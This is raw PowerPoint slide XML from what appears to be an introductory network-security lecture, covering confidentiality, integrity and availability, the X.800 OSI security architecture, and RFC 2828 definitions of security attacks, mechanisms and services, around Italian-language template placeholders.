              <a:t>• Integrity – Consider a hospital patient's allergy information stored in a database. The doctor should be able to trust that the information is correct and current. Now suppose that an employee (e.g., a nurse) who is authorized to view and update this information deliberately falsifies the data to cause harm to the hospital. The database needs to be restored to a trusted basis quickly, and it should be possible to trace the error back to the person responsible. Patient allergy information is an example of an asset with a high requirement for integrity. Inaccurate information could result in serious harm or death to a patient and expose the hospital to massive liability.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT" sz="1100" smtClean="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>• Availability - The more critical a component or service, the higher is the level of availability required. Consider a system that provides authentication services for critical systems, applications, and devices. An interruption of service results in the inability for customers to access computing resources and staff to access the resources they need to perform critical tasks. The loss of the service translates into a large financial loss in lost employee productivity and potential customer loss.</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04B6BB-A5FB-49DA-8407-43B19FA3D3A4}" type="slidenum">
              <a:rPr lang="en-AU" altLang="it-IT"/>
              <a:pPr>
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
              </a:pPr>
              <a:t>33</a:t>
            </a:fld>
            <a:endParaRPr lang="en-AU" altLang="it-IT"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1834544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smtClean="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smtClean="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>1.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT" sz="1100" smtClean="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smtClean="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>2.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT" sz="1100" smtClean="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smtClean="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>3.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT" sz="1100" smtClean="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smtClean="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>4. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT" sz="1100" smtClean="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smtClean="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>5.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT" sz="1100" smtClean="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smtClean="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>6. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT" sz="1100" smtClean="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smtClean="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>7. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT" sz="1100" smtClean="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smtClean="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>8. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT" sz="1100" smtClean="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smtClean="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>9. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT" sz="1100" smtClean="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smtClean="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>10. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT" sz="1100" smtClean="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smtClean="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34</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E583645-1D3E-4467-98D0-A2150866849A}" type="slidenum">
              <a:rPr lang="en-AU" altLang="it-IT"/>
              <a:pPr>
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
              </a:pPr>
              <a:t>35</a:t>
            </a:fld>
            <a:endParaRPr lang="en-AU" altLang="it-IT"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="78851" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noRo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To assess effectively the security needs of an organization and to evaluate and choose various security products and policies, the manager responsible for security needs some systematic way of defining the requirements for security and characterizing the approaches to satisfying those requirements. This is difficult enough in a centralized data processing environment; with the use of local and wide area networks the problems are compounded. ITU-T Recommendation X.800, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT" i="1" smtClean="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Security Architecture for OSI</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT" smtClean="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>, defines such a systematic approach. The OSI security architecture is useful to managers as a way of organizing the task of providing security.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1975606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24CA93D-FB35-432B-BB24-1218F803C3EB}" type="slidenum">
              <a:rPr lang="en-AU" altLang="it-IT"/>
              <a:pPr>
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
              </a:pPr>
              <a:t>36</a:t>
            </a:fld>
            <a:endParaRPr lang="en-AU" altLang="it-IT"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="80899" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noRo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solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>State here a couple of definitions of “security services” from relevant standards</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT" i="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>X.800 defines a security service as a service provided by a protocol layer of communicating open systems, which ensures adequate security of the systems or of data transfers. Perhaps a clearer definition is found in RFC 2828, which provides the following definition: a processing or communication service that is provided by a system to give a specific kind of protection to system resources; security services implement security policies and are implemented by security mechanisms. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="it-IT" i="1" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" altLang="it-IT" i="1"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7797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CD57BEF-4120-43C8-BE6B-9B6078D5101E}" type="slidenum">
              <a:rPr lang="en-AU" altLang="it-IT"/>
              <a:pPr>
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
              </a:pPr>
              <a:t>37</a:t>
            </a:fld>
            <a:endParaRPr lang="en-AU" altLang="it-IT"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="82947" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noRo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This general model shows that there are four basic tasks in designing a particular security service, as listed.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2435386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2B8270D-8950-4A4D-A056-95D8B517278A}" type="slidenum">
              <a:rPr lang="en-AU" altLang="it-IT"/>
              <a:pPr>
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
              </a:pPr>
              <a:t>38</a:t>
            </a:fld>
            <a:endParaRPr lang="en-AU" altLang="it-IT"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="84995" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noRo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Detail here the tasks needed to use this model.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="213851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E85D1CA-281E-403A-82C2-D81055F71BE6}" type="slidenum">
              <a:rPr lang="en-AU" altLang="it-IT"/>
              <a:pPr>
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
              </a:pPr>
              <a:t>39</a:t>
            </a:fld>
            <a:endParaRPr lang="en-AU" altLang="it-IT"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="87043" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noRo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rPr>
              <a:t>Chapter 1 summary.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="387275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egnaposto immagine diapositiva 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2150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2150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924D630-3354-4418-8529-3FDC93914453}" type="slidenum">
              <a:rPr lang="en-AU" altLang="it-IT"/>
              <a:pPr>
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
              </a:pPr>
              <a:t>5</a:t>
            </a:fld>
            <a:endParaRPr lang="en-AU" altLang="it-IT"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3756983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6</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7</a:t>
            </a:fld>
            <a:endParaRPr lang="en-AU" altLang="it-IT"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25603" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noRo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mtClean="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smtClean="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>• </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT" b="1" smtClean="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Security attack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT" smtClean="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smtClean="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>• </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT" b="1" smtClean="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Security mechanism</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT" smtClean="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smtClean="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>• </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT" b="1" smtClean="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Security service</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT" smtClean="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smtClean="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>In the literature, the terms </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT" i="1" smtClean="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>threat and attack </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT" smtClean="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smtClean="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Internet Security Glossary.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT" b="1" smtClean="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Threat - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT" smtClean="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smtClean="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Attack - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT" smtClean="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smtClean="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8</a:t>
            </a:fld>
            <a:endParaRPr lang="en-AU"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1183384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smtClean="0">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12</a:t>
            </a:fld>
            <a:endParaRPr lang="en-AU" altLang="it-IT"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="43033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Connettore 1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29" name="Titolo 28"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="381000" y="4853411"/>
            <a:ext cx="8458200" cy="1222375"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t"/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="accent2">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" smtClean="0"/>
              <a:t>Fare clic per modificare lo stile del titolo</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Sottotitolo 8"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="381000" y="3886200"/>
            <a:ext cx="8458200" cy="914400"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="l">
              <a:buNone/>
              <a:defRPr sz="2400">
                <a:solidFill>
                  <a:schemeClr val="accent2">
                    <a:lumMod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it-IT" dirty="0" smtClean="0"/>
              <a:t>Fare clic per modificare lo stile del sottotitolo dello schema</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Segnaposto data 15"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Segnaposto piè di pagina 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Segnaposto numero diapositiva 14"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8229600" y="6473825"/>
            <a:ext cx="758825" cy="247650"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr smtClean="0"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{E30DD24F-67AF-49E4-8BA2-032B9243D12D}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>‹N›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1696670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10"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Segnaposto piè di pagina 27"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Segnaposto numero diapositiva 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{969688F0-DA35-4367-9E64-C2C01DC0466F}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>‹N›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="88766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858000" y="549276"/>
            <a:ext cx="1828800" cy="5851525"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="eaVert"/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" smtClean="0"/>
              <a:t>Fare clic per modificare lo stile del titolo</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Segnaposto testo verticale 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" orient="vert" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="549276"/>
            <a:ext cx="62484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10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Segnaposto piè di pagina 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Segnaposto numero diapositiva 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr smtClean="0"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{FA4CA473-E73F-4862-A06D-D0DFFEC13383}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>‹N›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="528560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2" name="Titolo 21"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" smtClean="0"/>
              <a:t>Fare clic per modificare lo stile del titolo</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27" name="Segnaposto contenuto 26"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" smtClean="0"/>
              <a:t>Fare clic per modificare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4" name="Segnaposto data 24"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Segnaposto piè di pagina 18"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3581400" y="76200"/>
            <a:ext cx="2895600" cy="288925"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Segnaposto numero diapositiva 15"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8229600" y="6473825"/>
            <a:ext cx="758825" cy="247650"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
